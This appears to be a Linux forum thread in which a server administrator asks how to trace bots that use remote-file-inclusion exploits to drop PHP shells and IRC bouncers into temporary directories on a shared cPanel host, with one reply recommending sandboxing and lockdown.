Find the answer to your Linux question:
Results 1 to 4 of 4
I have a multiuser server that has apache running as nobody and bots using RFI exploits to drop php shells. The shells are being used to drop psybnc and other ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Jul 2009
    Posts
    10

    Tracking down source of bots with user nobody


    I have a multiuser server that has apache running as nobody and bots using RFI exploits to drop php shells. The shells are being used to drop psybnc and other crap in /dev/shm, /tmp and /var/tmp (all as user nobody). Given the size of this server it's very difficult to find their php shells because the names are always different and find is too slow. I need to find what php script is creating the bots in the temporary directories. We have installed suPHP on some servers which helps to locate the users' webroots, but not always the files. They create the files and close the write streams fast enough that I can't lsof to their creator.

    Any creative solutions?

  2. #2
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,380
    Taking this bass-ackward aren't we? First, sandbox your web server (chroot it's file system) and lockdown system directories and files. Change root password, and use SELinux and high-security encryption for system passwords. Take this server off-line until it is locked down and scrubbed of infected web pages.
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  3. #3
    Just Joined!
    Join Date
    Jul 2009
    Posts
    10
    The server runs cPanel which, so far as I know, doesn't support chrooting at the moment. The root password is changed frequently, they haven't gained root. SELinux isn't a viable option unfortunately. I can't take the server offline because there are about 300 users.

    We have lots of ways to prevent the shells from dropping but given the volume of accounts it will still occur no matter what measures we take. The problem I'm really having is finding the root source. Is there any hackish way to log all php execution commands?

  4. #4
    Just Joined!
    Join Date
    Jul 2009
    Posts
    10
    The server runs cPanel which, so far as I know, doesn't support chrooting at the moment. The root password is changed frequently, they haven't gained root. SELinux isn't a viable option unfortunately. I can't take the server offline because there are about 300 users.

    We have lots of ways to prevent the shells from dropping but given the volume of accounts it will still occur no matter what measures we take. The problem I'm really having is finding the root source. Is there any hackish way to log all php execution commands? I'm able to find most r57 and c99 shells through the apache logs, still having trouble finding the obscure ones.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •